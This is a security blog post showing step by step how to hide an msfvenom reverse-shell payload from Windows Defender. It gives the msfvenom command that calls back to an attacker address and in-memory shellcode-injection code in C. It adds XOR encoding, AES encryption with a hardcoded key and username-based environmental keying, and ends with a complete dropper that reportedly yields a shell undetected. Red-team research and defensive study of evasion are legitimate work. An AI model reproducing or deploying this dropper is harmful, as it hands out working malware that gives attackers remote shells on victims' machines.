Jack O'Sullivan
May 4 2021
Antivirus (AV) software is often the last line of defence against malicious actors. When a spam filter misses an evil attachment, when the browser fails to warn us about the low reputation of a certain file, or when someone at the office decides to ignore all the warnings and keeps clicking “I understand and accept the risk”, the AV is the one put on the spot to determine whether the executable that is about to run can really be trusted. But how much harder is it for an attacker to infect a fully patched Windows computer with an active antivirus solution than one without?
In this article, we will improve our understanding of the level of protection offered by Windows Defender and see how basic changes can let an off-the-shelf malicious payload fly under Defender’s radar. We will explore some obfuscation techniques to disguise shellcode produced with msfvenom (a generic payload generation tool from the Metasploit Framework (MSF), whose output is easily identified by consumer-grade antivirus products) and see how Windows Defender performs against the different tactics.
We will do this iteratively: starting with raw shellcode that is injected and run from memory, we will improve the code in stages, each one disguising its final intention with a different method.
1. Simple shellcode loader
We will start by creating a simple payload with the help of the MSF’s tool msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.3 LPORT=445 -f C
Now let’s create a C program that will inject the shellcode into memory and spawn a new thread that runs it.
First, we store the resulting code from msfvenom in an array:
unsigned char shellcode[] = { 0xfc, 0x48, 0x83, [...] 0x89, 0xda, 0xff, 0xd5 };
The snippet above was edited for brevity.
Then, we reserve memory space inside the running process. This space will later be used to write our shellcode. This is done by invoking the “VirtualAlloc” function of the Win32 API, which returns a pointer to the beginning of the space of memory reserved.
LPVOID basePageAddress;
basePageAddress = VirtualAlloc(
NULL, //LPVOID lpAddress,
(SIZE_T)sizeof(shellcode), //SIZE_T dwSize,
MEM_COMMIT | MEM_RESERVE, //DWORD flAllocationType,
PAGE_EXECUTE_READWRITE //DWORD flProtect
);
To better understand what we are requesting from the Win32 API, here is a breakdown of the function parameters, extracted from Microsoft’s documentation:
- lpAddress: Starting address of the region to allocate. If this parameter is NULL, the system determines where to allocate the region.
- dwSize: Size of the region in bytes. We get the size of our shellcode with the sizeof operator.
- flAllocationType: Type of memory allocation. With MEM_RESERVE, we reserve a range of the process’ virtual address space, and with MEM_COMMIT we ask Windows to back that reserved range with actual memory. This could be done in two separate steps, but VirtualAlloc allows us to perform both operations at once by combining the two constants with a bitwise OR.
- flProtect: Memory protection for the region. With PAGE_EXECUTE_READWRITE we request permissions for reading, writing, and executing data in that region. Strictly speaking, we would initially need only read and write permissions to store the shellcode in the process’ memory, and later only read and execute permissions to run it. That approach would be safer when attempting to avoid detection, especially against more advanced anti-malware solutions. In this example, however, we ask for all three permissions at once for the sake of simplicity.
Now that the memory is allocated and we have a pointer to it, we can write our shellcode in this space with the “RtlMoveMemory” function.
RtlMoveMemory(basePageAddress, //VOID UNALIGNED *Destination,
&shellcode, //const VOID UNALIGNED *Source,
(SIZE_T)sizeof(shellcode) //SIZE_T Length
);
We will execute the shellcode we just wrote by creating a new thread with the function “CreateThread”, which returns a handle to the newly created thread that we will need later.
HANDLE threadHandle;
threadHandle = CreateThread(
NULL, //LPSECURITY_ATTRIBUTES lpThreadAttributes,
0, //SIZE_T dwStackSize,
(LPTHREAD_START_ROUTINE)basePageAddress, //LPTHREAD_START_ROUTINE lpStartAddress,
NULL, //__drv_aliasesMem LPVOID lpParameter,
0, //DWORD dwCreationFlags,
NULL //LPDWORD lpThreadId
);
According to the function documentation at Microsoft, the function parameters work as follows:
- lpThreadAttributes: A pointer to a SECURITY_ATTRIBUTES structure that determines whether the returned handle can be inherited by child processes. If lpThreadAttributes is NULL, the handle cannot be inherited, which is not relevant for our current purposes.
- dwStackSize: The initial size of the stack, in bytes. If this parameter is zero, the new thread uses the default size for the executable.
- lpStartAddress: A pointer to the starting address of the new thread. Here we are passing the pointer to the beginning of the space of memory we previously allocated and wrote. This is what will allow us to execute our payload by telling the new thread to start executing at the beginning of our payload.
- lpParameter: A pointer to a variable to be passed to the thread. This could be useful for more advanced scenarios (e.g., a self-decrypting shellcode that receives the key as a parameter), but not necessary for this one. For that reason, we will just indicate that we do not require any parameters by passing NULL.
- dwCreationFlags: This controls the conditions of the creation of the thread. For this example, we pass zero to tell it to run the thread immediately after its creation.
- lpThreadId: A pointer to a variable that receives the thread identifier. If this parameter is NULL, the thread identifier is not returned.
Before ending the program, we need to wait for the new thread to finish. If we reached the final “return” statement first, the process would terminate and take the new thread with it. We prevent this with the “WaitForSingleObject” function, which waits for an object to enter the signalled state.
WaitForSingleObject(threadHandle, //HANDLE hHandle,
INFINITE //DWORD dwMilliseconds
);
We pass the function the handle that we obtained when we created the new thread and, with the INFINITE value, tell it to wait indefinitely for the thread object to be signalled.
Trying to save the binary to disk on the target machine raised an alert from Defender. As expected, it quickly flagged the binary and identified it as a Metasploit-related attack.
2. Encoded shellcode
Now we will write our own quick and dirty XOR encoder to avoid detection from Defender. The following code applies three consecutive XOR rounds with bytes 0x42, 0x43, and 0x44 as keys. We arbitrarily chose the number of rounds and the characters to encode with to ensure that the encoder itself, as well as the payload, would not already have been signatured, as is the case with MSF’s default encoders.
void TripleXor(unsigned char* buf, int size) {
const char encoderChar = '\x42';
for (int i = 0; i < size; i++) {
for (int j = 0; j < 3; j++) {
buf[i] = buf[i] ^ (encoderChar + j);
}
}
}
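One property of this encoder is worth noting. XOR is associative, so three rounds with 0x42, 0x43, and 0x44 should be equivalent to a single round with the byte 0x42 ^ 0x43 ^ 0x44 = 0x45. The following is a minimal sketch that checks this on arbitrary test data rather than on a payload; the names triple_xor, single_xor, and rounds_collapse are ours and do not appear in the original program.

```c
#include <stddef.h>
#include <string.h>

/* Three XOR rounds with consecutive key bytes, mirroring the encoder above. */
void triple_xor(unsigned char *buf, size_t size) {
    const unsigned char base = 0x42;
    for (size_t i = 0; i < size; i++) {
        for (int j = 0; j < 3; j++) {
            buf[i] ^= (unsigned char)(base + j);
        }
    }
}

/* A single XOR round with one key byte. */
void single_xor(unsigned char *buf, size_t size, unsigned char key) {
    for (size_t i = 0; i < size; i++) {
        buf[i] ^= key;
    }
}

/* Returns 1 if both encoders agree on every possible byte value. */
int rounds_collapse(void) {
    unsigned char a[256], b[256];
    for (int i = 0; i < 256; i++) {
        a[i] = b[i] = (unsigned char)i;
    }
    triple_xor(a, sizeof a);
    single_xor(b, sizeof b, 0x42 ^ 0x43 ^ 0x44); /* combined key: 0x45 */
    return memcmp(a, b, sizeof a) == 0;
}
```

If the check holds, the extra rounds add no strength over a single-byte XOR; they only change which constant ends up in the binary.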
In our new iteration of the dropper program, we use the same function above to decode the pre-encoded payload. Then, we inject it into memory employing the same technique previously described.
unsigned char shellcode[] = {0x20, 0x5e, 0x4a, [...] 0x91, 0x0a, 0xe3};
TripleXor(shellcode, sizeof(shellcode)-1);
// Allocate memory
LPVOID basePageAddress = VirtualAlloc(NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Write memory
RtlMoveMemory(basePageAddress, decipheredBuffer, (SIZE_T)size);
// Create thread that points to shellcode
HANDLE threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL);
//Wait for the thread to run
WaitForSingleObject(threadHandle, INFINITE);
The encoding applied to the shellcode made no difference to its detection. Again, Defender caught this new version as soon as it touched disk.
3. AES encrypted shellcode
Defender was smart enough to detect the intended behaviour of the program with static analysis, even when the encoding used was not likely to be signatured. For our next step, we will use encryption instead of encoding. Our aim here is to double down on our efforts to hide the intention of our shellcode, making it harder for Defender to predict what will happen from static analysis. Moreover, encryption will change the entropy of the shellcode more drastically than encoding, and entropy is something that could also be signatured.
The golden rule in infosec is “don’t roll your own crypto”. Cryptography should not be taken lightly, and a lot can go wrong when someone who is not a cryptographer tries to come up with a new encryption method, or even attempts to create their own implementation of a well-established one.
Luckily for us, we can use libraries that already implement these methods. We will go with an AES library (https://github.com/SergeyBel/AES) that will provide us with a strong and standard encryption mechanism that is relatively straightforward to use.
This AES library, however, does not handle padding or out-of-bound errors. It assumes that the key is the right size (16 bytes) and that the data to be encrypted can be divided exactly into blocks of 128 bits. For this reason, we need to add NOP codes (0x90) at the end of the shellcode until its length is a multiple of 16 bytes (512 bytes in this case).
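The padding arithmetic can be sketched as follows. This is a minimal illustration that assumes a 16-byte block size; padded_length and pad_buffer are hypothetical helper names and are not part of the AES library.

```c
#include <stddef.h>
#include <string.h>

#define BLOCK_SIZE 16 /* AES block size in bytes (128 bits) */

/* Round len up to the next multiple of BLOCK_SIZE. */
size_t padded_length(size_t len) {
    return (len + BLOCK_SIZE - 1) / BLOCK_SIZE * BLOCK_SIZE;
}

/*
 * Copy src into dst and fill the rest of the last block with `filler`.
 * dst must hold at least padded_length(len) bytes.
 * Returns the padded size.
 */
size_t pad_buffer(unsigned char *dst, const unsigned char *src,
                  size_t len, unsigned char filler) {
    size_t total = padded_length(len);
    memcpy(dst, src, len);
    memset(dst + len, filler, total - len);
    return total;
}
```

With these helpers, a 460-byte input would be padded to 464 bytes, while an input that is already a multiple of 16 bytes is left at its original length.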
The code to encrypt the payload looks as follows.
unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a,0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
unsigned int outLen = 0;
unsigned int size = sizeof(shellcode);
AES aes(128);
unsigned char* cipheredBuffer = aes.EncryptECB(shellcode, size, key, outLen);
aes.printHexArray(cipheredBuffer, size);
Now we grab this output and place it as a char array in our new dropper, which will decrypt the shellcode before injecting it into memory. The key is stored as a variable in the same dropper.
unsigned char key[] = { 0x43, 0x5e, 0x3b, 0xde, 0x6a, 0x10, 0x07, 0x3f, 0x3a,0xf9, 0xa1, 0x5a, 0xd3, 0x11, 0x03, 0xd0 };
unsigned int size = sizeof(cipheredBuffer);
AES aes(128);
unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, key);
After compiling this new version, we were able to download it from an HTTP server and store it on disk, which had always been prevented up to this point.
Executing the binary does not trigger any alerts either, and rewards us with a shell to the target machine.
4. Environmental Keying
Even if we achieved our initial goal of avoiding detection by Defender, we should bear in mind that this naïve approach would probably not suffice against more advanced AV products that will analyse the behaviour of the binary at runtime with features like sandboxing or in-memory analysis.
As a bonus improvement to our dropper, we will use information present in the target environment as the key to decrypt the shellcode. In a more advanced scenario, this can be used by threat actors to ensure that the malware will only run when it reaches its objective (https://attack.mitre.org/techniques/T1480/001/), protecting their code from malware analysts and sandboxes. For our example, we will just use the username running the binary as the key to decrypt the payload, as this is simple enough to implement and test.
As explained previously, the AES library assumes that the key will be 16 bytes long. For this reason, we need to pad our key if the username is shorter, or truncate it if it is longer.
#define KEYLENGTH 16
unsigned char* generateKey(unsigned char* username, int username_len) {
unsigned char key[KEYLENGTH];
char padding = 0x01;
for (int i = 0; i < KEYLENGTH; i++) {
if (i > username_len - 1) {
key[i] = padding;
padding++;
}
else key[i] = username[i];
}
return key;
}
Now we encrypt our payload with the username that will run the dropper on the target machine.
unsigned char username[] = "IEUser";
unsigned int outLen = 0;
unsigned int size = sizeof(shellcode);
AES aes(128);
unsigned char* key = generateKey(username, sizeof(username));
unsigned char* cipheredBuffer = aes.EncryptECB(shellcode, size, key, outLen);
printf("Encrypted payload:\n");
aes.printHexArray(cipheredBuffer, size);
We then save the encrypted payload in our dropper and extract the username at runtime with the “GetUserNameA” function. Finally, we recreate the key used to encrypt the payload with the generateKey function before injecting it into memory.
CHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
GetUserNameA(username, &username_len);
unsigned int size = sizeof(cipheredBuffer);
AES aes(128);
unsigned char* key = generateKey((unsigned char *)username, username_len);
unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, (unsigned char *)key);
We should highlight that this code will attempt to decrypt and run the payload even if the key is not correct. Running it in an environment with a different username could corrupt the process memory and even crash the system. In a real scenario, the dropper should first test whether the key is correct and only then decrypt and run the shellcode, exiting otherwise.
The final dropper code looks as follows.
#include <Windows.h>#include <Lmcons.h>
#include "AES.h" // https://github.com/SergeyBel/AES
#define KEYLENGTH 16
unsigned char* generateKey(unsigned char* username, int username_len) {
unsigned char key[KEYLENGTH];
char padding = 0x01;
for (int i = 0; i < KEYLENGTH; i++) {
if (i > username_len - 1) {
key[i] = padding;
padding++;
}
else key[i] = username[i];
}
return key;
}
int main() {
unsigned char cipheredBuffer[] = {
0xa5, 0xaf, 0x30, 0x3d, 0x34,
[...]
0x95, 0x37, 0xf8, 0xf1
};
CHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
// Get username
GetUserNameA(username, &username_len);
unsigned int size = sizeof(cipheredBuffer);
// Generate key
unsigned char* key = generateKey((unsigned char *)username, username_len);
AES aes(128);
// Decrypt Payload
unsigned char* decipheredBuffer = aes.DecryptECB(cipheredBuffer, size, (unsigned char *)key);
// Allocate memory
LPVOID basePageAddress = VirtualAlloc(NULL, (SIZE_T)size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (basePageAddress == NULL) {
return 1;
}
// Write memory
RtlMoveMemory(basePageAddress, decipheredBuffer, (SIZE_T)size);
// Create thread that points to shellcode
HANDLE threadHandle;
threadHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)basePageAddress, NULL, 0, NULL);
//Wait for the thread to run
WaitForSingleObject(threadHandle, INFINITE);
return 0;
}
5. Conclusions
Today we avoided being detected by Windows Defender. It was smart enough to flag the shellcode even after encoding it, but a robust encryption mechanism was enough to prevent detection.
This approach sufficed to avoid detection by Defender. However, enterprise solutions would most likely still flag it as suspicious, as some of the techniques used in the final binary, such as the memory injection or the execution from a new thread, are well known. In addition, the Win32 API calls they require in this example are monitored by more advanced AV solutions. Moreover, inspecting the memory of the process would reveal the unencrypted payload, which is heavily signatured, as we have seen.
This illustrates an important point: commodity anti-malware solutions are designed to stop most threats and to protect regular users in their everyday activities, but they will not stop a well-resourced attacker. Corporations should look into more advanced solutions if they want to secure their assets against advanced threat actors, for whom bypassing Windows Defender is possible.